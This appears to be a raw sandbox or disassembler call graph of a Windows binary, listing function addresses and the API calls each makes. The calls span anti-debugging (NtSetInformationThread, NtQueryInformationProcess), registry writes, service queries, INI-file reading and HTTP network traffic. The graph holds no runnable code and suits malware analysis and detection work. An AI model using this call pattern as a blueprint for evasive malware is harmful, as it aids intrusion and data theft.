
25173->25386 25175 286e340 25175->25153 25379 2863145 25175->25379 25176->25153 25178 28884a2 GetFileAttributesW 25176->25178 25178->25153 25182 2865b6e 25181->25182 25824 286397d 25182->25824 25184 2865be5 25184->25062 25185 2865bc8 25185->25184 25186 28617e4 RtlFreeHeap 25185->25186 25186->25184 25188 2865b8e 25188->25184 25188->25185 25835 2865b07 25188->25835 25190 286fc5f 25189->25190 25191 2862ec7 2 API calls 25190->25191 25195 286fc7b 25191->25195 25192 286fd0c 25192->25065 25193 286fd06 25842 28832c7 RtlFreeHeap 25193->25842 25195->25192 25195->25193 25840 288365b RtlFreeHeap 25195->25840 25197 286fcd6 25198 28834cf 5 API calls 25197->25198 25199 286fcfa 25198->25199 25841 2883858 RegCreateKeyExW RegCloseKey GetFileAttributesW 25199->25841 25202 2865e11 25201->25202 25203 2865e15 25201->25203 25202->25071 25203->25202 25206 2866075 25203->25206 25208 2866044 25203->25208 25209 2865f7c CreateThread 25203->25209 25211 2866066 25203->25211 25204 28617e4 RtlFreeHeap 25204->25206 25205 2866084 25206->25205 25207 28617e4 RtlFreeHeap 25206->25207 25207->25205 25210 28617e4 RtlFreeHeap 25208->25210 25209->25208 25212 2865f9b 25209->25212 25210->25211 25211->25204 25211->25206 25212->25211 25213 2866015 25212->25213 25843 2865aa6 25212->25843 25215 2866028 FindCloseChangeNotification 25213->25215 25216 2865aa6 RtlFreeHeap 25213->25216 25215->25211 25216->25215 25848 2866ef4 25218->25848 25222 2863145 2 API calls 25221->25222 25223 287f5ab 25222->25223 25225 287f5d6 25223->25225 25852 286317f 25223->25852 25225->25075 25226 287f5f8 25855 287918e 25226->25855 25228 287f610 25229 287f6c7 25228->25229 25231 287f6bc 25228->25231 25892 287f2c0 RtlFreeHeap 25228->25892 25870 287987c 25229->25870 25232 28617e4 RtlFreeHeap 25231->25232 25232->25229 25233 287f794 25234 28617e4 RtlFreeHeap 25233->25234 25234->25225 25235 287f6e8 25235->25225 25235->25233 25893 287f2c0 RtlFreeHeap 25235->25893 25239 2884be0 25238->25239 25240 2884c08 25239->25240 25242 2884c10 25239->25242 
25246 2884c0e 25239->25246 25241 28617e4 RtlFreeHeap 25240->25241 25241->25246 25243 28617e4 RtlFreeHeap 25242->25243 25244 2884c45 25243->25244 25245 28617e4 RtlFreeHeap 25244->25245 25245->25246 25246->25081 25248 2884cca 25247->25248 25250 2884ccf 25247->25250 25905 286ca8c RegCreateKeyExA 25248->25905 25253 2884cf0 25250->25253 25906 2868b9f RtlFreeHeap 25250->25906 25251 2884d58 25251->25083 25253->25251 25254 2884d52 25253->25254 25256 2884d5a 25253->25256 25907 2868c04 RtlFreeHeap RegCreateKeyExW RegCloseKey RegCreateKeyExA GetFileAttributesW 25254->25907 25908 2883cec RtlFreeHeap RegCloseKey 25256->25908 25259 2863145 2 API calls 25258->25259 25261 2870803 25259->25261 25260 287081a 25260->25089 25261->25260 25262 2863145 2 API calls 25261->25262 25263 287084a 25262->25263 25264 2870853 25263->25264 25909 2870d19 25263->25909 25917 28855ff 25264->25917 25269 2870cf4 Sleep 25276 287085d 25269->25276 25271 28617e4 RtlFreeHeap 25271->25276 25276->25269 25276->25271 25277 2885420 RtlFreeHeap 25276->25277 25934 288524a 25276->25934 25948 287a8e1 25276->25948 25955 287a99e 25276->25955 25959 287abcb 25276->25959 25971 287f011 RtlFreeHeap 25276->25971 25277->25276 25279->25086 25280->25127 25282 286db36 25281->25282 25388 286e6a4 25282->25388 25284 286db41 25285 286db5c NtQueryInformationProcess 25284->25285 25296 286db45 25284->25296 25286 286db7a 25285->25286 25393 2865446 25286->25393 25290 286dcb6 25409 286d269 25290->25409 25292 286dcca 25294 286dce2 25292->25294 25413 286d0af 25292->25413 25294->25296 25431 2870623 RtlFreeHeap RegCreateKeyExA RegCloseKey 25294->25431 25296->25138 25298 286de11 25297->25298 25299 286de0c 25297->25299 25301 286de1d 25298->25301 25452 286e9a2 25298->25452 25629 286e93a RtlFreeHeap RegCreateKeyExW RegCloseKey 25299->25629 25305 286de2b 25301->25305 25456 286e9f0 25301->25456 25304 286df04 25304->25140 25305->25304 25308 286de85 25305->25308 25588 2863f33 25305->25588 25307 286de76 25594 287d6b6 25307->25594 25601 2874fb6 
25308->25601 25313 286dee5 25313->25304 25619 2884444 25313->25619 25314 286deb2 25314->25313 25630 2875a56 RtlFreeHeap 25314->25630 25316 286dee0 25631 28770c0 RtlFreeHeap RegCloseKey RegCreateKeyExA 25316->25631 25319 286df35 25319->25304 25320 286df49 Sleep 25319->25320 25625 2884512 25320->25625 25323 2884512 PostMessageA 25324 286df80 25323->25324 25325 2884512 PostMessageA 25324->25325 25325->25304 25327 28671fc 25326->25327 25328 2862802 2 API calls 25327->25328 25329 286727a 25327->25329 25328->25329 25329->25152 25331 286d4f9 25330->25331 25340 286d4f2 25330->25340 25331->25340 25758 286d4b9 25331->25758 25333 286d58b 25334 286d4b9 5 API calls 25333->25334 25336 286d5ca 25333->25336 25334->25333 25335 286d741 25766 2877aed 25335->25766 25336->25335 25763 288d99a OpenSCManagerW 25336->25763 25339 286d751 25339->25340 25774 2867a69 25339->25774 25340->25147 25343 286ff5d 25342->25343 25811 2868578 25343->25811 25345 286ff68 25346 2862b90 RegOpenKeyExA 25345->25346 25347 286ffbe 25346->25347 25348 28617e4 RtlFreeHeap 25347->25348 25349 286fff6 25347->25349 25348->25349 25350 2862b90 RegOpenKeyExA 25349->25350 25351 287006f 25350->25351 25352 2862b90 RegOpenKeyExA 25351->25352 25353 28700ae 25352->25353 25354 2862b90 RegOpenKeyExA 25353->25354 25355 287010b 25354->25355 25356 28617e4 RtlFreeHeap 25355->25356 25357 2870175 25355->25357 25356->25357 25358 28617e4 RtlFreeHeap 25357->25358 25359 2870215 25357->25359 25358->25359 25360 28617e4 RtlFreeHeap 25359->25360 25362 2870242 25359->25362 25360->25362 25361 286e31f 25364 286d78a 25361->25364 25362->25361 25363 28617e4 RtlFreeHeap 25362->25363 25363->25361 25367 286d79c 25364->25367 25365 286db19 25365->25153 25375 287039f 25365->25375 25366 286227a RtlFreeHeap 25366->25367 25367->25365 25367->25366 25368 2867fd8 13 API calls 25367->25368 25369 2883c88 RtlFreeHeap RegCreateKeyExA 25367->25369 25371 2867ef8 RtlFreeHeap RegCreateKeyExW RegCloseKey 25367->25371 25372 2863145 2 API calls 25367->25372 25374 28679df 
RegCreateKeyExW 25367->25374 25816 2883bfe RegCreateKeyExW RegCloseKey 25367->25816 25817 286494b RegCreateKeyExA 25367->25817 25368->25367 25369->25367 25371->25367 25372->25367 25374->25367 25376 28703c1 25375->25376 25377 2863145 2 API calls 25376->25377 25378 28703f7 25376->25378 25377->25378 25378->25175 25380 2862ec7 2 API calls 25379->25380 25381 2863168 25380->25381 25382 2866ed1 25381->25382 25818 2864592 25382->25818 25385->25173 25386->25168 25387->25170 25389 286e6b8 25388->25389 25392 286e744 25389->25392 25432 28651f6 25389->25432 25391 286e720 GetLongPathNameW 25391->25392 25392->25284 25394 2865462 25393->25394 25395 2865472 GetNativeSystemInfo 25394->25395 25396 2865496 25395->25396 25397 286ceba 25396->25397 25398 286cedd 25397->25398 25436 2862b90 RegOpenKeyExA 25398->25436 25400 286cf24 25438 2862802 25400->25438 25402 286cf96 25403 2863145 2 API calls 25402->25403 25404 286cfbd 25403->25404 25442 286531a 25404->25442 25407 2862802 2 API calls 25408 286d016 25407->25408 25408->25290 25410 286d28e 25409->25410 25448 28640d2 25410->25448 25412 286d2ab 25412->25292 25414 286d0d0 25413->25414 25415 2862b90 RegOpenKeyExA 25414->25415 25416 286d169 25415->25416 25417 286d19d 25416->25417 25419 288dc1d GetFileAttributesW 25416->25419 25418 2862b90 RegOpenKeyExA 25417->25418 25420 286d1b4 25418->25420 25419->25417 25422 286d1e8 25420->25422 25423 288dc1d GetFileAttributesW 25420->25423 25421 286d21c 25424 2862b90 RegOpenKeyExA 25421->25424 25422->25421 25426 288dc1d GetFileAttributesW 25422->25426 25423->25422 25425 286d22e 25424->25425 25427 2862b90 RegOpenKeyExA 25425->25427 25426->25421 25428 286d243 25427->25428 25429 2862b90 RegOpenKeyExA 25428->25429 25430 286d258 25429->25430 25430->25294 25431->25296 25433 286522e 25432->25433 25434 28651fe 25432->25434 25433->25391 25434->25433 25435 2865215 GetPEB 25434->25435 25435->25433 25437 2862bb1 25436->25437 25437->25400 25439 286286e 25438->25439 25440 286281d 25438->25440 25439->25402 25440->25439 
25441 2862848 RegQueryValueExA RegCloseKey 25440->25441 25441->25439 25443 286532b 25442->25443 25447 2865335 25442->25447 25444 2865362 GetSystemInfo 25443->25444 25443->25447 25445 2865376 25444->25445 25446 2862b90 RegOpenKeyExA 25445->25446 25445->25447 25446->25445 25447->25407 25449 28640e9 25448->25449 25451 2864123 25448->25451 25450 2862802 2 API calls 25449->25450 25450->25451 25451->25412 25453 286e9ba 25452->25453 25454 286e9e9 25453->25454 25632 2863ea9 25453->25632 25454->25301 25641 2888645 25456->25641 25458 286ea05 25458->25305 25459 286ea01 25459->25458 25460 2863145 2 API calls 25459->25460 25461 286ead6 25460->25461 25470 286eb38 25461->25470 25694 288a855 RtlFreeHeap 25461->25694 25463 2888b35 3 API calls 25464 286ec77 25463->25464 25662 2888b35 25464->25662 25466 286ecb3 25467 2888b35 3 API calls 25466->25467 25468 286ece2 25467->25468 25469 2888b35 3 API calls 25468->25469 25471 286ed0e 25469->25471 25470->25463 25470->25464 25472 2888b35 3 API calls 25471->25472 25473 286ed3a 25472->25473 25474 2888b35 3 API calls 25473->25474 25475 286ed66 25474->25475 25476 2888b35 3 API calls 25475->25476 25477 286ed8b 25476->25477 25478 2888b35 3 API calls 25477->25478 25479 286edb7 25478->25479 25480 2888b35 3 API calls 25479->25480 25481 286ede3 25480->25481 25482 2888b35 3 API calls 25481->25482 25483 286ee0f 25482->25483 25484 2888b35 3 API calls 25483->25484 25485 286ee39 25484->25485 25486 2888b35 3 API calls 25485->25486 25487 286ee65 25486->25487 25488 2888b35 3 API calls 25487->25488 25489 286ee91 25488->25489 25490 2888b35 3 API calls 25489->25490 25491 286eebd 25490->25491 25492 2888b35 3 API calls 25491->25492 25494 286eef7 25492->25494 25493 286ef2f 25495 2888b35 3 API calls 25493->25495 25494->25493 25496 2888b35 3 API calls 25494->25496 25497 286ef5e 25495->25497 25496->25493 25498 2888b35 3 API calls 25497->25498 25499 286ef8a 25498->25499 25500 2888b35 3 API calls 25499->25500 25501 286efb6 25500->25501 25502 2888b35 3 API calls 
25501->25502 25503 286efe2 25502->25503 25504 2888b35 3 API calls 25503->25504 25505 286f00c 25504->25505 25506 2888b35 3 API calls 25505->25506 25507 286f04b 25506->25507 25508 2888b35 3 API calls 25507->25508 25509 286f079 25508->25509 25510 2888b35 3 API calls 25509->25510 25511 286f0a5 25510->25511 25512 2888b35 3 API calls 25511->25512 25513 286f0d1 25512->25513 25514 2888b35 3 API calls 25513->25514 25515 286f0fd 25514->25515 25516 2888b35 3 API calls 25515->25516 25517 286f137 25516->25517 25518 2888b35 3 API calls 25517->25518 25519 286f165 25518->25519 25520 2888b35 3 API calls 25519->25520 25521 286f191 25520->25521 25522 2888b35 3 API calls 25521->25522 25523 286f1bd 25522->25523 25524 2888b35 3 API calls 25523->25524 25525 286f1e9 25524->25525 25526 2888b35 3 API calls 25525->25526 25527 286f215 25526->25527 25528 2888b35 3 API calls 25527->25528 25529 286f241 25528->25529 25530 2888b35 3 API calls 25529->25530 25531 286f26d 25530->25531 25532 2888b35 3 API calls 25531->25532 25533 286f299 25532->25533 25534 2888b35 3 API calls 25533->25534 25535 286f2c5 25534->25535 25536 2888b35 3 API calls 25535->25536 25537 286f2ef 25536->25537 25538 2888b35 3 API calls 25537->25538 25539 286f319 25538->25539 25540 2888b35 3 API calls 25539->25540 25541 286f345 25540->25541 25542 2888b35 3 API calls 25541->25542 25543 286f391 25541->25543 25542->25543 25546 2888b35 3 API calls 25543->25546 25548 286f3d3 25543->25548 25544 286f544 25666 2889d40 25544->25666 25546->25548 25547 286f420 25552 286f494 25547->25552 25558 286f431 25547->25558 25548->25547 25549 286f49a 25548->25549 25695 287d8d6 RegQueryValueExA RegCloseKey 25548->25695 25549->25544 25554 2888b35 3 API calls 25549->25554 25551 286f3ff 25551->25547 25555 2865e00 3 API calls 25551->25555 25696 2873a9e GetPriorityClass SetPriorityClass SetPriorityClass 25552->25696 25554->25544 25555->25547 25558->25549 25560 2888b35 3 API calls 25558->25560 25560->25549 25561 286fa62 25562 286fb82 25561->25562 25563 286fb5c 
25561->25563 25565 286fb9c 25562->25565 25568 286fb91 25562->25568 25686 2874c93 25563->25686 25566 286fb9a 25565->25566 25571 2888f54 3 API calls 25565->25571 25570 286fb7a 25566->25570 25572 2888f54 3 API calls 25566->25572 25567 286fb61 25690 2888f54 25567->25690 25697 2888f80 25568->25697 25570->25458 25574 28617e4 RtlFreeHeap 25570->25574 25573 286fbb7 25571->25573 25576 286fbea 25572->25576 25577 2888f54 3 API calls 25573->25577 25574->25458 25578 2888f54 3 API calls 25576->25578 25579 286fbc6 25577->25579 25580 286fbf9 25578->25580 25582 2888f54 3 API calls 25579->25582 25581 2888f54 3 API calls 25580->25581 25583 286fc08 25581->25583 25582->25566 25584 286fc1a 25583->25584 25585 2888f54 3 API calls 25583->25585 25584->25570 25586 2888f54 3 API calls 25584->25586 25585->25584 25586->25570 25587 286f54e 25587->25458 25670 28892d6 25587->25670 25589 2863f4b 25588->25589 25591 2863f87 25589->25591 25712 2862ac0 25589->25712 25592 2862802 2 API calls 25591->25592 25593 2863fad 25591->25593 25592->25593 25593->25307 25716 288c43e 25594->25716 25597 287d740 25597->25308 25600 287d6da 25725 288c4ab RtlFreeHeap 25600->25725 25602 288c43e 3 API calls 25601->25602 25603 2874fd0 25602->25603 25604 286dead 25603->25604 25746 288c2b6 RtlFreeHeap 25603->25746 25608 288cee2 25604->25608 25607 2874fe1 25747 288c4ab RtlFreeHeap 25607->25747 25609 288c43e 3 API calls 25608->25609 25610 288cef6 25609->25610 25611 288cf6a 25610->25611 25748 288c2b6 RtlFreeHeap 25610->25748 25611->25314 25613 288cf63 25750 288c4ab RtlFreeHeap 25613->25750 25615 288cf01 25615->25613 25749 288ca64 RtlFreeHeap 25615->25749 25617 288cf4b 25618 28617e4 RtlFreeHeap 25617->25618 25618->25613 25620 2865e00 3 API calls 25619->25620 25621 2884465 25620->25621 25622 288448c 25621->25622 25623 288446b Sleep 25621->25623 25622->25319 25751 2865bed 25623->25751 25626 2884524 25625->25626 25627 286df6f 25626->25627 25754 288449d 25626->25754 25627->25323 25629->25298 25630->25316 25631->25313 25633 2863eb5 
25632->25633 25636 2863ebf 25632->25636 25634 2863eea 25633->25634 25633->25636 25637 2863ef6 25633->25637 25634->25636 25639 286668f RtlFreeHeap 25634->25639 25636->25454 25637->25636 25640 286668f RtlFreeHeap 25637->25640 25639->25636 25640->25636 25642 288864e 25641->25642 25643 2888652 25641->25643 25642->25459 25644 288869a 25643->25644 25645 28886a7 25643->25645 25647 28886a5 25643->25647 25646 28617e4 RtlFreeHeap 25644->25646 25648 28886ba 25645->25648 25649 28886e1 25645->25649 25646->25647 25647->25459 25650 28617e4 RtlFreeHeap 25648->25650 25653 2888781 25649->25653 25658 288870a 25649->25658 25651 28886c5 25650->25651 25652 28617e4 RtlFreeHeap 25651->25652 25652->25647 25654 28617e4 RtlFreeHeap 25653->25654 25656 2888791 25654->25656 25655 2888739 25655->25459 25657 28617e4 RtlFreeHeap 25656->25657 25657->25655 25658->25655 25659 28617e4 RtlFreeHeap 25658->25659 25660 2888766 25659->25660 25661 28617e4 RtlFreeHeap 25660->25661 25661->25655 25663 2888b42 25662->25663 25664 2888b3c 25662->25664 25663->25466 25664->25663 25665 2888f80 3 API calls 25664->25665 25665->25663 25668 2889d52 25666->25668 25667 2889d58 25667->25587 25668->25667 25669 28617e4 RtlFreeHeap 25668->25669 25669->25667 25677 28892ea 25670->25677 25671 286fa59 25678 288c5f6 25671->25678 25672 2889407 25706 288900b RtlFreeHeap 25672->25706 25675 2889411 25676 28617e4 RtlFreeHeap 25675->25676 25676->25671 25677->25671 25677->25672 25700 28890b6 25677->25700 25679 288c614 25678->25679 25680 286171c RtlFreeHeap 25679->25680 25685 288c78b 25679->25685 25682 288c741 25680->25682 25681 28617e4 RtlFreeHeap 25681->25685 25682->25681 25683 288c92c 25683->25561 25684 28617e4 RtlFreeHeap 25684->25683 25685->25683 25685->25684 25687 2874c9f 25686->25687 25688 2888b35 3 API calls 25687->25688 25689 2874cff 25687->25689 25688->25689 25689->25567 25691 2888f65 25690->25691 25692 2888f77 25691->25692 25693 2888f80 3 API calls 25691->25693 25692->25570 25693->25692 25694->25470 25695->25551 25696->25549 
25707 2888f9a GetPriorityClass 25697->25707 25701 28890c8 25700->25701 25705 288910d 25700->25705 25702 288913a CreateFileW 25701->25702 25701->25705 25703 2889162 CreateFileMappingW 25702->25703 25702->25705 25704 288918a MapViewOfFile 25703->25704 25703->25705 25704->25705 25705->25677 25706->25675 25708 2888fb9 SetPriorityClass 25707->25708 25709 2888fc7 25707->25709 25708->25709 25710 2888ff8 SetPriorityClass 25709->25710 25711 2888f94 25709->25711 25710->25711 25711->25566 25713 2862acc 25712->25713 25715 2862aff 25712->25715 25714 2862ae1 RegCreateKeyExA 25713->25714 25713->25715 25714->25715 25715->25589 25717 288c44a 25716->25717 25719 287d6cc 25717->25719 25726 2862de3 25717->25726 25719->25597 25724 288c2b6 RtlFreeHeap 25719->25724 25720 288c45c 25720->25719 25732 2862ec7 25720->25732 25723 28617e4 RtlFreeHeap 25723->25719 25724->25600 25725->25597 25727 2862ea6 25726->25727 25728 2862df8 25726->25728 25727->25720 25728->25727 25729 28617e4 RtlFreeHeap 25728->25729 25730 2862e7f 25729->25730 25738 2862a42 25730->25738 25733 2862fb7 25732->25733 25734 2862edd 25732->25734 25733->25719 25733->25723 25734->25733 25735 28617e4 RtlFreeHeap 25734->25735 25736 2862f86 25735->25736 25742 28629bc 25736->25742 25739 2862a56 25738->25739 25740 2862a85 25738->25740 25739->25740 25741 2862a62 RegCreateKeyExA 25739->25741 25740->25727 25741->25740 25743 2862a3b 25742->25743 25744 28629d7 25742->25744 25743->25733 25744->25743 25745 2862a23 RegCloseKey 25744->25745 25745->25743 25746->25607 25747->25604 25748->25615 25749->25617 25750->25611 25752 2865c17 25751->25752 25753 2865bfb NtSetInformationThread 25751->25753 25752->25622 25753->25752 25755 288450a 25754->25755 25756 28844ab 25754->25756 25755->25626 25756->25755 25757 28844fa PostMessageA 25756->25757 25757->25755 25781 286d39f 25758->25781 25762 286d4da 25762->25333 25764 288d9bb OpenServiceW 25763->25764 25765 288d9b4 25763->25765 25764->25765 25765->25335 25767 2877b09 25766->25767 25771 2877b02 25766->25771 
25772 2877b44 25767->25772 25799 28777e4 RtlFreeHeap GetFileAttributesW 25767->25799 25769 2877c07 25770 288dc1d GetFileAttributesW 25769->25770 25769->25771 25770->25771 25771->25339 25772->25769 25772->25771 25773 288dc1d GetFileAttributesW 25772->25773 25773->25769 25775 2867b5c 25774->25775 25776 2867a7a 25774->25776 25775->25340 25776->25775 25800 28679df 25776->25800 25778 2867ab8 25779 2862722 2 API calls 25778->25779 25780 2867b57 25779->25780 25780->25340 25782 286d3ad 25781->25782 25790 286d3c2 Sleep 25782->25790 25791 2874831 25782->25791 25787 286d493 SleepEx FindCloseChangeNotification 25787->25790 25788 286d4ac 25789 28617e4 RtlFreeHeap 25788->25789 25789->25790 25790->25762 25792 287485c 25791->25792 25793 286d472 25792->25793 25794 28617e4 RtlFreeHeap 25792->25794 25793->25790 25795 2865d65 25793->25795 25794->25793 25796 2865d79 25795->25796 25798 2865d72 25795->25798 25797 2865d91 CreateThread 25796->25797 25797->25798 25798->25787 25798->25788 25799->25772 25801 28679fb 25800->25801 25802 2867a65 25801->25802 25807 2862b27 25801->25807 25802->25778 25805 2862b27 RegCreateKeyExW 25806 2867a5f 25805->25806 25806->25778 25808 2862b34 25807->25808 25810 2862b66 25807->25810 25809 2862b46 RegCreateKeyExW 25808->25809 25808->25810 25809->25810 25810->25805 25812 286857c 25811->25812 25813 286857f 25811->25813 25812->25345 25814 28617e4 RtlFreeHeap 25813->25814 25815 28685a0 25813->25815 25814->25815 25815->25345 25816->25367 25817->25367 25819 28645c5 25818->25819 25821 28645bd 25818->25821 25820 28645f5 CreateFileA 25819->25820 25820->25821 25822 286460e 25820->25822 25821->25162 25823 286463d CreateFileA 25822->25823 25823->25821 25825 286398d 25824->25825 25834 2863997 25824->25834 25826 28639b7 CreateToolhelp32Snapshot 25825->25826 25825->25834 25827 28639c8 25826->25827 25826->25834 25828 28639d7 Thread32First 25827->25828 25829 28639fc 25828->25829 25828->25834 25830 2863a17 Thread32Next 25829->25830 25831 2863a26 FindCloseChangeNotification 
25829->25831 25830->25829 25830->25831 25832 2863a31 25831->25832 25831->25834 25833 28617e4 RtlFreeHeap 25832->25833 25833->25834 25834->25188 25837 2865b12 25835->25837 25836 2865b3f 25836->25188 25837->25836 25839 286668f RtlFreeHeap 25837->25839 25839->25836 25840->25197 25841->25193 25842->25192 25844 2865ab3 25843->25844 25846 2865aaf 25843->25846 25844->25846 25847 286668f RtlFreeHeap 25844->25847 25846->25213 25847->25846 25849 2866f10 25848->25849 25850 2865e00 3 API calls 25849->25850 25851 2866f3c Sleep 25849->25851 25850->25851 25851->25074 25853 2862fda 2 API calls 25852->25853 25854 2863197 25853->25854 25854->25226 25856 28791a5 25855->25856 25864 287946f 25855->25864 25857 2879436 25856->25857 25861 2879230 CreateFileW 25856->25861 25856->25864 25858 2879455 25857->25858 25859 28617e4 RtlFreeHeap 25857->25859 25860 2879461 25858->25860 25895 2861caf RtlFreeHeap 25858->25895 25859->25858 25863 28617e4 RtlFreeHeap 25860->25863 25860->25864 25861->25860 25865 2879259 25861->25865 25863->25864 25864->25228 25865->25857 25894 2861b93 RtlFreeHeap 25865->25894 25867 28792b5 25867->25857 25868 286171c RtlFreeHeap 25867->25868 25869 28617e4 RtlFreeHeap 25867->25869 25868->25867 25869->25867 25872 2879af4 25870->25872 25880 2879891 25870->25880 25871 28617e4 RtlFreeHeap 25871->25872 25872->25235 25873 2879ac4 25874 28617e4 RtlFreeHeap 25873->25874 25875 2879acc 25874->25875 25876 2879ada 25875->25876 25877 28617e4 RtlFreeHeap 25875->25877 25878 2879ae8 25876->25878 25879 28617e4 RtlFreeHeap 25876->25879 25877->25876 25878->25871 25878->25872 25879->25878 25880->25872 25880->25873 25880->25878 25881 288dc1d GetFileAttributesW 25880->25881 25882 28799cc 25881->25882 25883 288dc1d GetFileAttributesW 25882->25883 25884 28799dc 25882->25884 25883->25884 25884->25873 25896 2879787 25884->25896 25887 2879787 2 API calls 25888 2879a68 25887->25888 25889 2879787 2 API calls 25888->25889 25890 2879aa8 25889->25890 25891 2879787 2 API calls 25890->25891 25891->25873 
25892->25228 25893->25235 25894->25867 25895->25860 25897 287979d 25896->25897 25901 287986f 25896->25901 25898 28797dc GetPrivateProfileSectionNamesW 25897->25898 25897->25901 25899 2879867 25898->25899 25903 28797ee 25898->25903 25900 28617e4 RtlFreeHeap 25899->25900 25900->25901 25901->25887 25903->25899 25904 28795c9 RtlFreeHeap 25903->25904 25904->25903 25905->25250 25906->25253 25907->25251 25908->25251 25910 2870d46 25909->25910 25911 288524a 2 API calls 25910->25911 25916 2870d5c 25910->25916 25913 2870d6c 25911->25913 25913->25916 25972 2885420 25913->25972 25914 2870d86 25914->25916 25979 288575c 25914->25979 25916->25264 25918 2865e00 3 API calls 25917->25918 25920 288561c 25918->25920 25919 2870858 25922 288543c 25919->25922 25920->25919 25921 2885633 FindCloseChangeNotification 25920->25921 25921->25919 25923 2885463 25922->25923 25924 288548f CreateFileW 25923->25924 25933 2885515 25923->25933 25926 28854b0 25924->25926 25924->25933 25925 28854e3 25927 28617e4 RtlFreeHeap 25925->25927 25929 28854e9 25925->25929 25926->25925 25928 28854cf ReadFile 25926->25928 25927->25929 25928->25925 25930 28617e4 RtlFreeHeap 25929->25930 25929->25933 25931 288551d 25930->25931 25983 2861768 RtlFreeHeap 25931->25983 25933->25276 25935 288525e 25934->25935 25936 2885305 getaddrinfo 25935->25936 25942 2885291 25935->25942 25947 28852f0 25935->25947 25937 288531f 25936->25937 25936->25947 25938 28853e3 25937->25938 25940 28617e4 RtlFreeHeap 25937->25940 25937->25947 25939 28853ed 25938->25939 25941 28617e4 RtlFreeHeap 25938->25941 25943 28617e4 RtlFreeHeap 25939->25943 25944 2885403 25939->25944 25940->25938 25941->25939 25945 28617e4 RtlFreeHeap 25942->25945 25942->25947 25943->25944 25946 28617e4 RtlFreeHeap 25944->25946 25944->25947 25945->25947 25946->25947 25947->25276 25949 287a8f5 25948->25949 25950 287a8f9 25948->25950 25949->25276 25984 2864199 25950->25984 25954 287a95f 25954->25276 25956 287a9b1 25955->25956 25957 287a9b5 25955->25957 25956->25276 
25957->25956 25958 287a9fe InternetConnectA 25957->25958 25958->25956 25960 287abe8 25959->25960 25962 287adbe 25959->25962 25960->25962 25988 287b56d 25960->25988 25962->25276 25963 28617e4 RtlFreeHeap 25963->25962 25964 287ace7 25964->25962 25965 287ad1e HttpSendRequestA 25964->25965 25966 287adac 25964->25966 25968 287ad30 25965->25968 25966->25963 25967 28617e4 RtlFreeHeap 25967->25966 25968->25966 25970 287aed4 25968->25970 26003 287afa1 14 API calls 25968->26003 25970->25967 25971->25276 25973 2885424 25972->25973 25974 2885427 25972->25974 25973->25914 25975 2885433 25974->25975 25976 28617e4 RtlFreeHeap 25974->25976 25977 28617e4 RtlFreeHeap 25975->25977 25976->25975 25978 2885439 25977->25978 25978->25914 25980 2885767 25979->25980 25982 288577f 25979->25982 25981 288576d socket 25980->25981 25980->25982 25981->25982 25982->25916 25983->25933 25985 28641a4 25984->25985 25986 28641c0 InternetOpenA 25984->25986 25985->25986 25987 28641b4 ObtainUserAgentString 25985->25987 25986->25954 25987->25986 25989 287b586 25988->25989 25990 287b750 25988->25990 25989->25990 25991 287b5f6 25989->25991 25992 287b61d 25989->25992 25996 287b614 25989->25996 25990->25964 25991->25996 26028 287c229 RtlFreeHeap 25991->26028 25992->25996 26029 287bf6b RtlFreeHeap 25992->26029 26004 287bb6a 25996->26004 25997 287b72a 25998 28617e4 RtlFreeHeap 25997->25998 25998->25990 25999 287b6fc 25999->25997 26022 287b760 25999->26022 26001 287b6db 26001->25997 26001->25999 26030 287ba43 RtlFreeHeap 26001->26030 26003->25970 26005 287bb82 26004->26005 26021 287bcdd 26004->26021 26006 2863145 2 API calls 26005->26006 26005->26021 26007 287bbe0 26006->26007 26008 2863145 2 API calls 26007->26008 26009 287bbf3 26008->26009 26010 2863145 2 API calls 26009->26010 26011 287bc06 26010->26011 26012 2863145 2 API calls 26011->26012 26013 287bc19 26012->26013 26014 2863145 2 API calls 26013->26014 26015 287bc2c 26014->26015 26016 2863145 2 API calls 26015->26016 26017 287bc3f 26016->26017 26031 
28656f5 26017->26031 26019 287bc51 26020 2862ec7 2 API calls 26019->26020 26020->26021 26021->26001 26023 287ba05 26022->26023 26025 287b777 26022->26025 26023->25997 26024 28617e4 RtlFreeHeap 26024->26023 26025->26023 26026 28617e4 RtlFreeHeap 26025->26026 26027 287b9f8 26025->26027 26026->26027 26027->26023 26027->26024 26028->25996 26029->25996 26030->25999 26032 2865702 26031->26032 26033 2865708 26031->26033 26032->26033 26034 2865724 GetTimeZoneInformation 26032->26034 26033->26019 26035 286573f 26034->26035 26035->26019 26058 2867ca5 13 API calls 24717 28660aa 24718 28660c1 24717->24718 24719 28660b7 24717->24719 24719->24718 24720 28660e5 NtSetInformationThread 24719->24720 24721 28660f8 24720->24721 24722 2866114 24721->24722 24723 28660fc 24721->24723 24737 2889fe6 Sleep 24722->24737 24750 28855d5 24722->24750 24754 288e7d9 24722->24754 24758 288a20e 24722->24758 24762 288e905 24722->24762 24774 28800ed 24722->24774 24724 28617e4 RtlFreeHeap 24723->24724 24724->24718 24725 286614b 24779 28617e4 24725->24779 24726 286611d 24726->24725 24730 28617e4 RtlFreeHeap 24726->24730 24730->24725 24783 2864c5d 24737->24783 24739 288a024 Sleep 24740 288a143 24739->24740 24745 288a00e 24739->24745 24740->24726 24743 288a20e 3 API calls 24743->24745 24744 288a0cf Sleep 24744->24745 24745->24739 24745->24740 24745->24743 24745->24744 24747 288a0f7 Sleep FindCloseChangeNotification 24745->24747 24787 288a7af 24745->24787 24791 288a294 24745->24791 24797 288a45c 24745->24797 24807 28834cf 24745->24807 24747->24745 24751 28855e2 24750->24751 24753 28855de 24750->24753 24873 288552b gethostname 24751->24873 24753->24726 24755 288e7e5 24754->24755 24756 288e815 CreateWindowExA 24755->24756 24757 288e833 24756->24757 24757->24726 24759 288a222 24758->24759 24760 288a227 24759->24760 24875 288383b 24759->24875 24760->24726 24764 288e91d 24762->24764 24773 288e916 24762->24773 24763 288e93c 24765 288e7d9 CreateWindowExA 24763->24765 24764->24763 24907 28846d8 RtlFreeHeap 
